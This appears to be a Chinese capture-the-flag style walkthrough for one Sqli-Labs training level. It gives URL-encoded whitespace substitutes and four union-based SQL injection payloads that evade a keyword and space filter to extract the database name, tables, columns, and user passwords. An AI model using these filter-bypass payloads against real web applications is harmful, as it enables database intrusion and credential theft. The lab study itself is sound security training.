本关过滤 空格
or
and
/*
#
--
/
等符号
可用过滤符如下
%09 | TAB键(水平) |
---|---|
%0a | 新建一行 |
%0c | 新的一页 |
%0d | return功能 |
%0b | TAB键(垂直) |
%a0 | 空格 |
使用联合查询,具体原理及解题方法可见专栏:Sqli-Labs靶场专栏
查库名:
id=0'%0bunion%0bselect%0b1,database(),3||'1'='1
回显如下:
查表名:
id=0'%0bunion%0bselect%0b2,group_concat(table_name),4%0bfrom%0binfoorrmation_schema.tables%0bwhere%0btable_schema=database()%26%26'1'='1
回显如下:
查列名:
id=0'%0bunion%0bselect%0b1,group_concat(column_name),3%0bfrom%0binfoorrmation_schema.columns%0bwhere%0btable_name='users'%0b%26%26%0btable_schema=database()%26%26'1'='1
回显如下:
查数据:
id=0'%0bunion%0bselect%0b2,(select%0bgroup_concat(concat_ws('-',id,username,passwoorrd))%0bfrom%0busers),4%0b||%0b'1'='1
回显如下: